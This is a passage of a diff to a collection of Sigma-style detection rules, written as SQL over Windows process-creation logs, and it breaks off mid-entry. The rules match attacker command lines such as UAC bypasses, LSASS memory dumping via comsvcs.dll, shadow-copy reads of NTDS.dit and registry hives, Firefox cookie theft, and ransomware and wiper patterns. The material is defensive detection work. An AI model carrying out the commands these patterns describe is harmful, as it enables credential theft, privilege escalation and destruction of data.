+ "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-s WebClient%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "SQLite Firefox Profile Data DB Access", + "id": "4833155a-4053-4c9c-a997-777fcea0baa7", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1539", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", - "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "status": "test", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (IntegrityLevel IN ('High', 'System') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects 